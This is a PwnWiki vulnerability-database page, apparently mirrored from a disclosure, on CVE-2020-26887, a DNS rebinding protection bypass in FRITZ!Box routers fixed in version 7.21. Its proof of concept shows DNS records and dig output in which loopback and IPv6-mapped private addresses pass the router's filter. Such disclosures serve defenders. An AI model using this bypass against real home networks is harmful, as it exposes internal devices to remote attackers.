Loading
0

CVE-2020-26887 DNS Rebinding Protection绕过漏洞/zh-cn

免费、自由、人人可编辑的漏洞库--pwnwiki.com

,

已修复版本

>= 7.21

POC

Supposing the following resource records (RR) are configured for different
subdomains of example.com:

------------------------------------------------------------------------
private.example.com        1  IN  A     192.168.178.20
local.example.com          1  IN  A     127.0.0.1
privateipv6.example.com.   1  IN  AAAA  ::ffff:192.168.178.20
------------------------------------------------------------------------

A DNS request to the FRITZ!Box router for the subdomain
private.example.com returns an empty answer, as expected:

------------------------------------------------------------------------
$ dig private.example.com @192.168.178.1
; <<>> DiG 9.11.5-P4-5.1+deb10u1-Debian <<>> private.example.com @192.168.178.1
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 58984
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 0

;; QUESTION SECTION:
;private.example.com.	IN	A
------------------------------------------------------------------------

DNS requests for the subdomains privateipv6.example.com and
local.example.com return the configured resource records successfully,
effectively bypassing the DNS rebinding protection:

------------------------------------------------------------------------
$ dig privateipv6.example.com @192.168.178.1 AAAA
; <<>> DiG 9.11.5-P4-5.1+deb10u1-Debian <<>> @192.168.178.1 privateipv6.example.com AAAA
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 6510
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 3

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;privateipv6.example.com.	IN	AAAA

;; ANSWER SECTION:
privateipv6.example.com. 1	IN	AAAA	::ffff:192.168.178.20


$ dig local.example.com @192.168.178.1
; <<>> DiG 9.11.5-P4-5.1+deb10u1-Debian <<>> local.example.com @192.168.178.1
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 28549
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 3

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;local.example.com.	IN	A

;; ANSWER SECTION:
local.example.com. 1	IN	A	127.0.0.1
------------------------------------------------------------------------

免费、自由、人人可编辑的漏洞库--PwnWiki.com